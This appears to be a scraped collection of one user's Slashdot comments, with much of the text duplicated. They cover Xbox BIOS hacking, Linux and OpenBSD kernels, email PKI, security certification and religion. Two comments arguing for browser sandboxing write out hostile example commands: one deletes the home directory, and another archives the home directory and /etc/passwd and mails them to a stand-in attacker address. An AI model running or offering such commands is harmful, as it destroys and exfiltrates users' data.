What the hell kind of nitro-burning printer needs a dual cpu Sun box to keep it fed? Dual cpus don't help you with io bandwidth. Couldn't that machine support both the scanner and the printer? How's Samba for print sharing?
Take that Xbox DVD remote and use that program for palm pilots that allows you to record and playback IR signals. Then please anonymously leak the recorded buttons on the web. This shouldn't break the DMCA, since it's information you're broadcasting, but that doesn't stop MS from filing suit.
I'm not sure if this would help or hurt MS, but it'd help consumers. (The XBox would be more competitive with a free DVD playing option, but ti wouldcut into sales for the DVD kit.)
What happens when they find a buffer overflow in the XBox IP stack or
a popular game? The XBox normally doesn't ever switch out of ring0, so
any buffer overflow is a kernel buffer overflow. You can't really enforce security restrictions between ring 0 code segments.
Come to think of it, maybe this is the easiest way to get Linux on the XBox...
Screw the encrypted BIOS... bootan approved game with a buffer overflow and overflow
the buffer with a ramdisk and a Linux kernel, then jump into the kernel... mount/usr
from NFS and you're all set. The HD would be unlocked, so you could install on the HD,
provided you trust your xfat drivers. It would be really slick to figure out the memory locations of the various MS XBox hardware drivers and be able to hijack them when you hijack the hardware. After all, they're already loaded into RAM when you execute your buffer overflow.
I hate to nit-pcik, but your naming is backwards. X clients don't do any rendering. X servers do rendering. Xfree86 is an X11 server. All of your programs take on the role of X clients in the client-server model. When the client wants something done or needs information, it connects to the Xserver. The client does all of the pushing and pulling of the data. The server sits there and waits for requests and processes them. The Xclients are the proactive parties in the transation model.
Do any of you know if the OpenBSD people have plans to replace blowfish with twofish in the kernel? What about Serpent and AES? Of all the people, I'm surprised that the OpenBSD people would be satisfied with "eh.. blowfish is good enough, why upgrade?".
See? This is what I hate about OpenBSD and its developers/users.. they always whine about Linux being so much more mediatized than their own OS, it all goes like 'we're such poor babies, no one notices our OS which is oh-so-much-better than mainstream Linux'
I've never had OpenBSD on any of my machines. I'm a Debian guy. I roll my own kernel.debs with encrypted loop and tweak my own USB keyboard driver. Yet, the 2.5 kernel probably isn't important enough to any of you to make the front page. If the kernel matters to you that much, you read kernel.org or at least read teh linux section and don't need it on the front page. Don't get me wrong, production kernel realeases or -ac kernel releases may still be front-page worthy, but unless the submitter mentions some really cool new feature, development kernel releases aren't front-page worthy.
I'm just saying that I'm quite the Debian fanboy. I just realize that unstable kernel release notices without cool feature highlights shouldn't make the front page while the OpenBSD release isn't up there. Now it's pretty much moot since they finally put up an OpenBSD story. (I would have submitted a story, but I would not have done it justice.)
Don't label me "one of those OpenBSD users/developers". I admire elegant design and good clean software. I've heard really good things about OpenBSD, but I am in no way an OpenBSD user. We'll see. Maybe I'll become an OpenBSD user sometime this week or next.
I would guess it's pretty much bug fixes from here on out in the 2.4 line. Sure, you'll get some more obscure drivers and such, but I don't thnik too much more exciting is going to happen. The new 2.4 kernel maintainer probably won't do anything too controversial, particularly after that VM switch Linus pulled earlier in 2.4.
The 2.5 kernel is a major rework. IIRC, they're making everything possible modules, and you'll need to make an initial ramdisk with your ide/scsi/network/fs drivers in order to boot. Any idea how stable 2.5 is now? It sounds pretty cool. I've dabbled in kernel programming and am willing to put up with 1 week uptimes as long as I'm running ext3 or XFS. I tried L4-linux, but 8-hour uptimes just hurt. Yes, I'm also playing with Debian HURD. There's lots of really cool stuff going on nowadays in the OS world.
Any idea if there are any plans to merge the international patch (crypto stuff) into 2.4 or 2.5? Encrypted loop devices and encrypted swap really should be part of the main kernel. After all, the 2.4 kernel is currently being maintained by a minor in South America, so the 2.4 kernel is pretty safe from the US govt/US courts at the moment. Hmm... DeCSS in kernel-space anyone?
There's also a perl script called autoupdate. Check it out. It runs pretty well. It's a pretty simple script, actually. No need to centrally register your machine. It just polls the RH update sight for new RPMs and checks them against the ones you have installed.
I had both autoupdate and up2date running on a box o' mine. I now run Debian and have it "apt-get update; apt-get dist-upgrade -y" nightly. I believe you can do similar things with FreeBSD and OpenBSD. The nice thing is, every piece of software on my box (except the loop-AES stuff and the Sun JDK) is within 24 hours of being up to date. FreeAmp, Gaim, KOffice, etc. all update.
Does windowsupdate cover WinZip. AIM, MS Office, and WinAmp? A buddy of mine got owned a bit over a year ago, just before MS decided to have windowsupdate cover IIS. He assumed IIS was covered b/c it came on the install CD. Within two weeks of installing Win2K Advanced Server, we found DDoS tools on his machine. That was the day his love turned to hate. He no longer defends anything MS or encourages use of MS software. His laptop still dual boots, but all of his servers run alternative OSes exclusively.
If you're going to use plaintext tools, you shouldn't even bother having seperate user accounts. Make one user account called "guest" with a null password. It's easier that way, ad it's effectively what you're doing when you use insecure protocols internaly.
Of course, if you're using 100% IPSec internally, then anythign that uses passwords for authentication should be fine. However, IIRC, rsh just checks the source port of the packet and then balieves that you are who you claimto be with absolutely no authentication. IPSec can't help you there.
From Bunnie's analysis (web.mit.edu/bunnie/) , it looks like the encrypted ROM is decrypted by the southbridge. Hopefully the encryption is a stream cipher (oh happy day if it's a data-independant stream cipher) so they can use trial and error to get OpenBIOS comming out of the southbridge. Bunnie is working on using an FPGA to read the output of the suthbridge. The stuff was slighlty over my head, but that's my understanding of the current state of the art in XBox BIOS hacking. (Is the BIOS loaded 8 bits at a time into RAM, or what was that full-duplex 9-wire bus protocol comming out of the southbridge?)
Bunnie says he's working on his thesis right now. MIT's thesis due date is the 24th, so hopefully we'll all see a lot more work on the Xbox BIOS in the next couple of months.
The HD is locked, so you need to go through the XBox boot sequence to get it unlocked then hot-wap the IDE cable while your PC BIOS is in setup mode, then leave setup mode for the HD to be recognized. It's not worth it unless you'r mirroring the HD to try and reverse-engineer the stupid thing.
You're fooling yourself if you thik you can reasonably salvage anything from an XBox at this point in time. Sure, if you have the proper test equipment, you can watch the XBox unlock the HD, but that's more work than it's worth for an 8 GB HD for most of us. If any of you has a broken XBox or knows of a good place to pick up one for free, I'm sure I could find some MIT students willng to play with the BIOS encryption this Summer. Luckily as the price falls, more people are willing to risk breaking their XBoxes in order to reverse-engineer the BIOS encryption.
If somoeone finally breaks the BIOS encryption on the XBox (or figures out a safe way to bypass the decryption while loading the BIOS) and we get Linux BIOS or Open BIOS on the XBox, I'd be mighty tempted to pick up an XBox or four. After all, I'm only running a 266 MHz with 288 MB of RAM really is fine for almost everything.).
You missed the point of the metaphore. I was talking about using duct tape in parallel with a lock. Taping your frame to the same post to which it's locked. If you don't trust the lock, the duct tape really does you no good. It's a completey different situation with a quick-release wheel vs. a duct taped quick-release wheel. My point is that if you aren't comfortable with a bike lock, you shouldn't feel any safer abouta bike lock wrapped in duct tape or a frame locked and taped to a pole. A good knife will mean an extra 10 seconds to the thief. If a lock isn't enough, you need to rethink your whole bike security strategy rather than adding duct tape. Maybe I should have said something about wrapping the lock in duct tape to make it harder to cut.
Something's wrong... I clicked on the PanIP link 5 times and the site is still up and running. I usually can't click on a front page ink once before the site goes down. What gives?
They're criminals. Why wouldn't they just steal one?
I know you're just trying to be funny, but for the benefit of the 14 year olds out there, there's more than one kind of criminal. Some kinds of criminals are not willing to do some things. Most criminals even have morals and justify thier crimes in their own heads and are not willing to do other kinds of crime. I think it's probably mucheasier for a criminal to convince himself/herself that credit card fraud is okay vs. breaking and entering being okay. I wouldn't be surprised if many/.
People who steal satelite TV are criminals. Why don't theyjust go out and mug people for the satelite TV money instead? It's a question of morals. 99% of criminals have them.
Somoene motivated enough to dig through sourc code to figure out your database vendor and version, etc., is also dedicated enough to use other profiling techniques. In the end, you're going to spend more time than it's worth trying to hide your database version. Anyone going after your source code is speciffically tageting your company. If looking though the source code is the easiest way for them to get that info, you're putting too much hard work into hiding that info.
Here's the easiest way to put the argument: sure it's harder for the attacker, but it's like using a Kryptonite lock and duct tape to attach your bike to the bike rack. Sure it's more secure, but not worth the effort. If you think you need the duct tape, maybe you should lock your bike in a better neighborhood and spend your time walking an extra 4 bocks or something instead of spending that same ammount of time attaching and cutting duct tape. In the same way, you should spend your time properly securing and maintaining all of your boxes, setting up proper cryptography, and enforcing strong passwords with proper limits on lifetimes. Try getting help setting up a firewall from MIT Network Security and they'll tell you to set up cron jobs to port scan your boxes and vulnerability scan your boxes instead. It's a bit extreme to discourage the use of firewalls, but I can definately see where thy're comming from. Just like Morris discouraging shadowed password files. md5 passwords and strongly enforced password complexity offer MUCH better seccurity than shadowed crypt password files.
I'll leave you with this thought: Consider the plight of the non-believer, surrounded 24/7 by people who actually believe this stuff; surrounded by a population of which 65% honestly believe there are angels flying around them throughout the day. It's literally like being trapped inside of a mad-house for your entire life.
Just a few points:
1) I'll freely admit that a lot of nuts get pulled into their own little version of the dominant religion. However, I'd rather have those nuts being devoted to loving other people than have them believe life is hopeless with no point, and then followingsome whim to go and shoot a few co-workers and then get gunned down by the police. Say what you will about Christianity, but I think objectively it's pretty much the safest outlet for nuts unwilling to go into treatment.
2) I consider myself a Christian. I do not consder American Pop Religion or American Folk Religion to be Christianity. What you're describing sounds to me like American Folk Religion. I agree that it sucks to be surrounded by that. I think it makes me look like an idiot because people hear the word "Christianity" and think of American Folk Religion (good people wo go to church become angels when they die) or American Pop Religion (be good, and go to Church a few tims a year to keep appearances up and consult your horroscope and you'll do fine).
3) Everyone thinks they are part of some small subset of the population that really understands how things work, well, at least every reasonably smart person believes this. I feel like fewerthan 5% of the population has the patience and intelligence to sit down and actuall think through what Christianity really teaches and perform appropriate reality checks. To flippantly deny all aspects of someone else's beliefs because you disagree with some of thier points is to deny yourself the opportunity of having your thought process challenged. Allow yourself to accet their axioms for but a moment and look at what they really have to say, from their perspective. It's a good mental excercise, sometimes painful, but I believe always worthwile. You may not learn anything worthwhile from them, but it helps you keep perspective and keeps your mind limber. At this point, I think anyone has an ice cube's chance in hell of changing any of my main points of belief, but I still am willing, and even enjoy, talking to others abouttheir beliefs. It's a good mental excercise.
4)The Church got itself into trouble back in the middle ages by making assertions about things which it really had nothing to say. Embracing Aristotlean physics was out of the scope of the Church's expertise. Likewise, experimntal science can not answer "why" questions. As fignman said , "Why does an elctron weigh?". To claim that Science is the ultimate authority on religion is just as false as saying religion is the ultimate authority on physics. Good science has never made claims on events occuring outside of time. Time is believed to have sprung into existance at the beginning of the universe. What about events outside of space-time. Obviously certain things have some analogy of "occuring" outside of time, otherwise time would not have "occured". Science intentionally does not make any claims about such things. Religion speculates about such things. SOmetimes these speculations claim certain things about things hapening inside of time. THese things are testable. Test them. However, please do not abuse science by using it to make claims that it cannot. People from all kinds of religions (including Christianity and Atheism) contort science to make it seem to say things it does not. Also realize that science is not one entity, just like religion is not oneentity science does not have a consensus on many things, just like Christianity does not have aconsensus on many things.
5) Even St. Augustene (one of the most respected Biblical Scolars of all time) wrote essays back before the middle ages arguing that the Bible could not be claiming the earth was created in a litteral 6 days. I wish Christians and non-Christians would stop throwing arround this 6 days thing. I'm an MIT student, my pastor decided to take some classes at seminary ater he got his physics degree from Harvard he got hooked and decided to teach Christianity instead of Physics. Christianity can provide the basis for a very rational and self-consistant worldview, just as atheism can. Don't believe me, check out the mp3 of some of his sermons .
no can do. owned by root or admin. you'll have to enter a root or admin password to do anything damaging.
Better, but not good enough. It's great that IE isn't actually part of OS X and the default account isn't and Admin (root) account, but there's still plenty of "damage" you could do. fileExec("rm -rf ~/;") sounds pretty good. Now, of course you make nightlybackups, so removing all of your files means a loss of only today's work, but it's still a pain in the arse. Oh, and does OS X have mimencode and mailto? It must have equivalent functionality somewhere. How'd you like fileExec("tar -cf - ~//etc/passwd | gzip --best | mimencode | mailto -s `ifconfig` blackhat@blackhat.com") I'm pretty sure the password hashes are in shadow on OS X, but the enumeration of users is helpful, as is all of your current user's directory.
Mac OS X is on the right path, but what the world really needs is good capabilities-based security. Your browser should not even be able to know if you have/bin/rm, much less be able to execute it, unless it asks you to give it an executable file handle to/bin/rm. The days of programs reasonably being assumed to actin the interests of the users are long gone. Security thinking should catch up and treat each program as a seperate user with few rights by default. In other words, everything should be sandboxed by default and should have to ask the user for anything out side of the sandbox.
Can't they actually make support cheaper by making a new desktop OS based on XP embedded?
It's supposedly a stripped down version of XP, right? Couldn't they just add a bunch of modules to XP Embedded to make it a desktop OS. THis would probably also make it lighter on its feet. It would also probably reduce the codebase they ned to support. It should also make it easier to get that EAL4 security rating they're after.
Strong Passwords
If people had a program to generate strong passwords, then there would befewer system and accounts for black hats to use to leapfrog across the net tohide their tracks. I'm working on a java applet that uses a strong PRNG seeded with user mouse movements and input from SecueRandom to generate 5 prnouncable passwords and 5 phrases made of real words. Something like this bundled with AOL's account setup program would do great things for teir security, and by extension, make the net a better place for everyone.
Public Key Infrastructure
ISPs should get Verisign or Thawte, or another big name certificate and use that to sign certificates for their customers. Give them a certificate with thier email address. In a couple of years the open mail relay spam problem will fix itself as everone will automatically throw away unsigned email and ISPs will revoke certs of spammers, or there will be public databases of spammer certs.
PKI doesn't cost companies very much, only a little for the certificate and a little bit of education. Many email client already have crypto plugins.
Sure, you'll still have problems, mostly from ISPs doing poor identity checking and users using bad passwords.
I know you're just making a funny, but the 14 year olds out there don't know this and it's a good point to make.
They and half the internet can read your email now. People already have a false sense of security, so having AOL handle your crypto is a huge step forward for 99.9% of the population.
Also, if it's properly implemented, they don't have to be able to read your email. They couldn't read your email if your private key is generated and encrypted inside the client before being stored on the server. As long as they only get to store an MD5 sum of your password, you can log in without jepordizing the salted hash used to encrypt the ecret key. They only need to sign the public key.
If I were to publish my GPG public key ring, it would most likely take you millions of years to extract my secret key. (Yes, quantum computing is a slight problem, but my public key is morevulnerable to a quantum discrete log attack than my password is vulnerable to a quatum 3DES and MD5 attack, given only a few bytes of known plaintext in the private key.) My passphrase is between 15 and 20 characters, using lower case, upper case, numbers and symbols. If I ever showed my GF my passphrase, she wouldn't be able to remember it because it makes no sense even to people who know me well. Sure, AOL could trojan your login or email client, but if you're that worried about AOL, there's always someone willing to let you use your own client. AOL is plenty trustworthy for the average person, as long as they'd have to trojan your login to get your passphrase (which is less than 40 bits of entropy for the average person, way less).
Encrypted email will arrive
on
Can GnuPG Deliver?
·
· Score: 5, Insightful
...as soon as AOL decides it makes business sense to integrate it.
I sign nearly all of my outgoing emails, but seriously, encryption will remain a geek toy until AOL or another big player decides to provide public key infrastructure (PKI, keys signed by eidey trusted authorities, or sufficiently many people that are minimally seperated from you) for its users. There are plenty of GUI encryption email clients out there. I believe there's a GPG plugin for Eudora. However, finding your friend's public key is hte big problem right now. Once everyone's ISPs ste[ in and sign the user's keys and proide key servers, then signed and encrypted email will be the norm. After a short bit, you will be able to filter out SPAM by doing good checks on signatures, or prosecuting those spammers that actually sign their emails with valid and registered keys. Encryption will also greatly increase CPU demands for mass emailing. This is why ISPs will like crypto: it deters spam and reduces thier bandwidth requirements. The big question is: how long will it take for a major ISP to start providing PKI.
Key generation isn't hard. Once AOL starts signing all of their users' public keys, then it will be common practice for you email client to go the all of the recipients' ISPs, verify their Verisign certificate, and verify theirsignature on the user's public key, then encrypt everything at transmit time.
Key generation isn't all that tough. Nearly everyone trusts Verisign.
I breifly worked for a startup that ran a brief stint at getting thier new programming language certified as EAL7... until they realized that it would probably take at least a minimum of $500,000 for each try at certification. This stuff is expensive (and with good reason). On top of that, each attempt at certification comes back with either "yes" or "no, and here's why...". If you try and get your system certified as EAL7 and it meets the criteria for EAL4 but not EAL7, you don't get an EAL4 certicifation, you get a failed EAL7 certification attempt.
A lot of this suff is based on design documentation (and an analysisof the design), demonstration that the design was followed, and solid clear end-user documentation.
I can't imagine a design that requires IE to be integrated with the OS will pass EAL4 certification, so they may end up purgering themselves durring the certification process. Too bad the certification documents don't need to be made public. I would strongly hope that nobody will EAL4 certify anything with I.E. integrated. It's track record seems to indicate that the design was not well reflected in the implementation. Keep an eye out, if the certified version of Win2K doesn't have I.E. integrated, maybe the DOJ can slap MS on the wrist one more time.
Solaris 8 has a special EAL4 version, but you (rightly) pay quite a premium for that version, as I understand it. In order to get something certified, you submit an exact copy of the system to be certified. If one bit (other than passwords, usernames, and groups) is different from what is certified (besides allowable changes specified in the certified end-user documentation), it's no longer EAL4 certified.
This is pretty hard-core stuff. THe previooous security record of Win2K doesn't really come into account, becuase the EAL version would be best described as aspecificconfiguration of an OS based on Win2K, not actually Win2K.
Debian is pretty hard core with quality standards. Bastille and Debian probably stand the best chance of beilng able to put together an EAL4 distro, but niether of them is that well off financially. RedHat has some quality issues, but should be able to put something together as good as the certified version of NT. I don't think the costs would be justified for RedHat right now, though. The chances are slim to none that you'll ever be able to serve web pages from an all-microsoft EAL4 system within a decade. I highly doubt that EAL4 version of Solaris 8 has a vebserver, at least one capable of dynamic content.
Slashdot Mirror
What the hell kind of nitro-burning printer needs a dual cpu Sun box to keep it fed? Dual cpus don't help you with io bandwidth. Couldn't that machine support both the scanner and the printer? How's Samba for print sharing?
I'm not sure if this would help or hurt MS, but it'd help consumers. (The XBox would be more competitive with a free DVD playing option, but ti wouldcut into sales for the DVD kit.)
What happens when they find a buffer overflow in the XBox IP stack or a popular game? The XBox normally doesn't ever switch out of ring0, so any buffer overflow is a kernel buffer overflow. You can't really enforce security restrictions between ring 0 code segments.
Come to think of it, maybe this is the easiest way to get Linux on the XBox... Screw the encrypted BIOS... bootan approved game with a buffer overflow and overflow the buffer with a ramdisk and a Linux kernel, then jump into the kernel... mount /usr
from NFS and you're all set. The HD would be unlocked, so you could install on the HD,
provided you trust your xfat drivers. It would be really slick to figure out the memory locations of the various MS XBox hardware drivers and be able to hijack them when you hijack the hardware. After all, they're already loaded into RAM when you execute your buffer overflow.
I hate to nit-pcik, but your naming is backwards. X clients don't do any rendering. X servers do rendering. Xfree86 is an X11 server. All of your programs take on the role of X clients in the client-server model. When the client wants something done or needs information, it connects to the Xserver. The client does all of the pushing and pulling of the data. The server sits there and waits for requests and processes them. The Xclients are the proactive parties in the transation model.
Do any of you know if the OpenBSD people have plans to replace blowfish with twofish in the kernel? What about Serpent and AES? Of all the people, I'm surprised that the OpenBSD people would be satisfied with "eh.. blowfish is good enough, why upgrade?".
I've never had OpenBSD on any of my machines. I'm a Debian guy. I roll my own kernel .debs with encrypted loop and tweak my own USB keyboard driver. Yet, the 2.5 kernel probably isn't important enough to any of you to make the front page. If the kernel matters to you that much, you read kernel.org or at least read teh linux section and don't need it on the front page. Don't get me wrong, production kernel realeases or -ac kernel releases may still be front-page worthy, but unless the submitter mentions some really cool new feature, development kernel releases aren't front-page worthy.
I'm just saying that I'm quite the Debian fanboy. I just realize that unstable kernel release notices without cool feature highlights shouldn't make the front page while the OpenBSD release isn't up there. Now it's pretty much moot since they finally put up an OpenBSD story. (I would have submitted a story, but I would not have done it justice.)
Don't label me "one of those OpenBSD users/developers". I admire elegant design and good clean software. I've heard really good things about OpenBSD, but I am in no way an OpenBSD user. We'll see. Maybe I'll become an OpenBSD user sometime this week or next.
The 2.5 kernel is a major rework. IIRC, they're making everything possible modules, and you'll need to make an initial ramdisk with your ide/scsi/network/fs drivers in order to boot. Any idea how stable 2.5 is now? It sounds pretty cool. I've dabbled in kernel programming and am willing to put up with 1 week uptimes as long as I'm running ext3 or XFS. I tried L4-linux, but 8-hour uptimes just hurt. Yes, I'm also playing with Debian HURD. There's lots of really cool stuff going on nowadays in the OS world.
Any idea if there are any plans to merge the international patch (crypto stuff) into 2.4 or 2.5? Encrypted loop devices and encrypted swap really should be part of the main kernel. After all, the 2.4 kernel is currently being maintained by a minor in South America, so the 2.4 kernel is pretty safe from the US govt/US courts at the moment. Hmm... DeCSS in kernel-space anyone?
I prefer Linux myself, but a major and highly respected new *NIX distro release beats a beta kernel release and day of my 8-day week.
</rant>
I had both autoupdate and up2date running on a box o' mine. I now run Debian and have it "apt-get update; apt-get dist-upgrade -y" nightly. I believe you can do similar things with FreeBSD and OpenBSD. The nice thing is, every piece of software on my box (except the loop-AES stuff and the Sun JDK) is within 24 hours of being up to date. FreeAmp, Gaim, KOffice, etc. all update.
Does windowsupdate cover WinZip. AIM, MS Office, and WinAmp? A buddy of mine got owned a bit over a year ago, just before MS decided to have windowsupdate cover IIS. He assumed IIS was covered b/c it came on the install CD. Within two weeks of installing Win2K Advanced Server, we found DDoS tools on his machine. That was the day his love turned to hate. He no longer defends anything MS or encourages use of MS software. His laptop still dual boots, but all of his servers run alternative OSes exclusively.
If you're going to use plaintext tools, you shouldn't even bother having seperate user accounts. Make one user account called "guest" with a null password. It's easier that way, ad it's effectively what you're doing when you use insecure protocols internaly.
Of course, if you're using 100% IPSec internally, then anythign that uses passwords for authentication should be fine. However, IIRC, rsh just checks the source port of the packet and then balieves that you are who you claimto be with absolutely no authentication. IPSec can't help you there.
Bunnie says he's working on his thesis right now. MIT's thesis due date is the 24th, so hopefully we'll all see a lot more work on the Xbox BIOS in the next couple of months.
You're fooling yourself if you thik you can reasonably salvage anything from an XBox at this point in time. Sure, if you have the proper test equipment, you can watch the XBox unlock the HD, but that's more work than it's worth for an 8 GB HD for most of us. If any of you has a broken XBox or knows of a good place to pick up one for free, I'm sure I could find some MIT students willng to play with the BIOS encryption this Summer. Luckily as the price falls, more people are willing to risk breaking their XBoxes in order to reverse-engineer the BIOS encryption.
If somoeone finally breaks the BIOS encryption on the XBox (or figures out a safe way to bypass the decryption while loading the BIOS) and we get Linux BIOS or Open BIOS on the XBox, I'd be mighty tempted to pick up an XBox or four. After all, I'm only running a 266 MHz with 288 MB of RAM really is fine for almost everything.).
Is this guy joking? I blck-holed doubleclick, so I can't tell.
You missed the point of the metaphore. I was talking about using duct tape in parallel with a lock. Taping your frame to the same post to which it's locked. If you don't trust the lock, the duct tape really does you no good. It's a completey different situation with a quick-release wheel vs. a duct taped quick-release wheel. My point is that if you aren't comfortable with a bike lock, you shouldn't feel any safer abouta bike lock wrapped in duct tape or a frame locked and taped to a pole. A good knife will mean an extra 10 seconds to the thief. If a lock isn't enough, you need to rethink your whole bike security strategy rather than adding duct tape. Maybe I should have said something about wrapping the lock in duct tape to make it harder to cut.
Something's wrong... I clicked on the PanIP link 5 times and the site is still up and running. I usually can't click on a front page ink once before the site goes down. What gives?
I know you're just trying to be funny, but for the benefit of the 14 year olds out there, there's more than one kind of criminal. Some kinds of criminals are not willing to do some things. Most criminals even have morals and justify thier crimes in their own heads and are not willing to do other kinds of crime. I think it's probably mucheasier for a criminal to convince himself/herself that credit card fraud is okay vs. breaking and entering being okay. I wouldn't be surprised if many /.
People who steal satelite TV are criminals. Why don't theyjust go out and mug people for the satelite TV money instead? It's a question of morals. 99% of criminals have them.
Here's the easiest way to put the argument: sure it's harder for the attacker, but it's like using a Kryptonite lock and duct tape to attach your bike to the bike rack. Sure it's more secure, but not worth the effort. If you think you need the duct tape, maybe you should lock your bike in a better neighborhood and spend your time walking an extra 4 bocks or something instead of spending that same ammount of time attaching and cutting duct tape. In the same way, you should spend your time properly securing and maintaining all of your boxes, setting up proper cryptography, and enforcing strong passwords with proper limits on lifetimes. Try getting help setting up a firewall from MIT Network Security and they'll tell you to set up cron jobs to port scan your boxes and vulnerability scan your boxes instead. It's a bit extreme to discourage the use of firewalls, but I can definately see where thy're comming from. Just like Morris discouraging shadowed password files. md5 passwords and strongly enforced password complexity offer MUCH better seccurity than shadowed crypt password files.
Just a few points:
1) I'll freely admit that a lot of nuts get pulled into their own little version of the dominant religion. However, I'd rather have those nuts being devoted to loving other people than have them believe life is hopeless with no point, and then followingsome whim to go and shoot a few co-workers and then get gunned down by the police. Say what you will about Christianity, but I think objectively it's pretty much the safest outlet for nuts unwilling to go into treatment.
2) I consider myself a Christian. I do not consder American Pop Religion or American Folk Religion to be Christianity. What you're describing sounds to me like American Folk Religion. I agree that it sucks to be surrounded by that. I think it makes me look like an idiot because people hear the word "Christianity" and think of American Folk Religion (good people wo go to church become angels when they die) or American Pop Religion (be good, and go to Church a few tims a year to keep appearances up and consult your horroscope and you'll do fine).
3) Everyone thinks they are part of some small subset of the population that really understands how things work, well, at least every reasonably smart person believes this. I feel like fewerthan 5% of the population has the patience and intelligence to sit down and actuall think through what Christianity really teaches and perform appropriate reality checks. To flippantly deny all aspects of someone else's beliefs because you disagree with some of thier points is to deny yourself the opportunity of having your thought process challenged. Allow yourself to accet their axioms for but a moment and look at what they really have to say, from their perspective. It's a good mental excercise, sometimes painful, but I believe always worthwile. You may not learn anything worthwhile from them, but it helps you keep perspective and keeps your mind limber. At this point, I think anyone has an ice cube's chance in hell of changing any of my main points of belief, but I still am willing, and even enjoy, talking to others abouttheir beliefs. It's a good mental excercise.
4)The Church got itself into trouble back in the middle ages by making assertions about things which it really had nothing to say. Embracing Aristotlean physics was out of the scope of the Church's expertise. Likewise, experimntal science can not answer "why" questions. As fignman said , "Why does an elctron weigh?". To claim that Science is the ultimate authority on religion is just as false as saying religion is the ultimate authority on physics. Good science has never made claims on events occuring outside of time. Time is believed to have sprung into existance at the beginning of the universe. What about events outside of space-time. Obviously certain things have some analogy of "occuring" outside of time, otherwise time would not have "occured". Science intentionally does not make any claims about such things. Religion speculates about such things. SOmetimes these speculations claim certain things about things hapening inside of time. THese things are testable. Test them. However, please do not abuse science by using it to make claims that it cannot. People from all kinds of religions (including Christianity and Atheism) contort science to make it seem to say things it does not. Also realize that science is not one entity, just like religion is not oneentity science does not have a consensus on many things, just like Christianity does not have aconsensus on many things.
5) Even St. Augustene (one of the most respected Biblical Scolars of all time) wrote essays back before the middle ages arguing that the Bible could not be claiming the earth was created in a litteral 6 days. I wish Christians and non-Christians would stop throwing arround this 6 days thing. I'm an MIT student, my pastor decided to take some classes at seminary ater he got his physics degree from Harvard he got hooked and decided to teach Christianity instead of Physics. Christianity can provide the basis for a very rational and self-consistant worldview, just as atheism can. Don't believe me, check out the mp3 of some of his sermons .
Better, but not good enough. It's great that IE isn't actually part of OS X and the default account isn't and Admin (root) account, but there's still plenty of "damage" you could do. fileExec("rm -rf ~/;") sounds pretty good. Now, of course you make nightlybackups, so removing all of your files means a loss of only today's work, but it's still a pain in the arse. Oh, and does OS X have mimencode and mailto? It must have equivalent functionality somewhere. How'd you like fileExec("tar -cf - ~/ /etc/passwd | gzip --best | mimencode | mailto -s `ifconfig` blackhat@blackhat.com") I'm pretty sure the password hashes are in shadow on OS X, but the enumeration of users is helpful, as is all of your current user's directory.
Mac OS X is on the right path, but what the world really needs is good capabilities-based security. Your browser should not even be able to know if you have /bin/rm, much less be able to execute it, unless it asks you to give it an executable file handle to /bin/rm. The days of programs reasonably being assumed to actin the interests of the users are long gone. Security thinking should catch up and treat each program as a seperate user with few rights by default. In other words, everything should be sandboxed by default and should have to ask the user for anything out side of the sandbox.
Anyone working on porting Wine to Win32? Seriously, this could help with a lot of error recovery and sandboxing :-)
It's supposedly a stripped down version of XP, right? Couldn't they just add a bunch of modules to XP Embedded to make it a desktop OS. THis would probably also make it lighter on its feet. It would also probably reduce the codebase they ned to support. It should also make it easier to get that EAL4 security rating they're after.
Strong Passwords
If people had a program to generate strong passwords, then there would befewer system and accounts for black hats to use to leapfrog across the net tohide their tracks. I'm working on a java applet that uses a strong PRNG seeded with user mouse movements and input from SecueRandom to generate 5 prnouncable passwords and 5 phrases made of real words. Something like this bundled with AOL's account setup program would do great things for teir security, and by extension, make the net a better place for everyone.
Public Key Infrastructure
ISPs should get Verisign or Thawte, or another big name certificate and use that to sign certificates for their customers. Give them a certificate with thier email address. In a couple of years the open mail relay spam problem will fix itself as everone will automatically throw away unsigned email and ISPs will revoke certs of spammers, or there will be public databases of spammer certs.
PKI doesn't cost companies very much, only a little for the certificate and a little bit of education. Many email client already have crypto plugins.
Sure, you'll still have problems, mostly from ISPs doing poor identity checking and users using bad passwords.
I know you're just making a funny, but the 14 year olds out there don't know this and it's a good point to make.
They and half the internet can read your email now. People already have a false sense of security, so having AOL handle your crypto is a huge step forward for 99.9% of the population.
Also, if it's properly implemented, they don't have to be able to read your email. They couldn't read your email if your private key is generated and encrypted inside the client before being stored on the server. As long as they only get to store an MD5 sum of your password, you can log in without jepordizing the salted hash used to encrypt the ecret key. They only need to sign the public key.
If I were to publish my GPG public key ring, it would most likely take you millions of years to extract my secret key. (Yes, quantum computing is a slight problem, but my public key is morevulnerable to a quantum discrete log attack than my password is vulnerable to a quatum 3DES and MD5 attack, given only a few bytes of known plaintext in the private key.) My passphrase is between 15 and 20 characters, using lower case, upper case, numbers and symbols. If I ever showed my GF my passphrase, she wouldn't be able to remember it because it makes no sense even to people who know me well. Sure, AOL could trojan your login or email client, but if you're that worried about AOL, there's always someone willing to let you use your own client. AOL is plenty trustworthy for the average person, as long as they'd have to trojan your login to get your passphrase (which is less than 40 bits of entropy for the average person, way less).
I sign nearly all of my outgoing emails, but seriously, encryption will remain a geek toy until AOL or another big player decides to provide public key infrastructure (PKI, keys signed by eidey trusted authorities, or sufficiently many people that are minimally seperated from you) for its users. There are plenty of GUI encryption email clients out there. I believe there's a GPG plugin for Eudora. However, finding your friend's public key is hte big problem right now. Once everyone's ISPs ste[ in and sign the user's keys and proide key servers, then signed and encrypted email will be the norm. After a short bit, you will be able to filter out SPAM by doing good checks on signatures, or prosecuting those spammers that actually sign their emails with valid and registered keys. Encryption will also greatly increase CPU demands for mass emailing. This is why ISPs will like crypto: it deters spam and reduces thier bandwidth requirements. The big question is: how long will it take for a major ISP to start providing PKI.
Key generation isn't hard. Once AOL starts signing all of their users' public keys, then it will be common practice for you email client to go the all of the recipients' ISPs, verify their Verisign certificate, and verify theirsignature on the user's public key, then encrypt everything at transmit time.
Key generation isn't all that tough. Nearly everyone trusts Verisign.
A lot of this suff is based on design documentation (and an analysisof the design), demonstration that the design was followed, and solid clear end-user documentation. I can't imagine a design that requires IE to be integrated with the OS will pass EAL4 certification, so they may end up purgering themselves durring the certification process. Too bad the certification documents don't need to be made public. I would strongly hope that nobody will EAL4 certify anything with I.E. integrated. It's track record seems to indicate that the design was not well reflected in the implementation. Keep an eye out, if the certified version of Win2K doesn't have I.E. integrated, maybe the DOJ can slap MS on the wrist one more time.
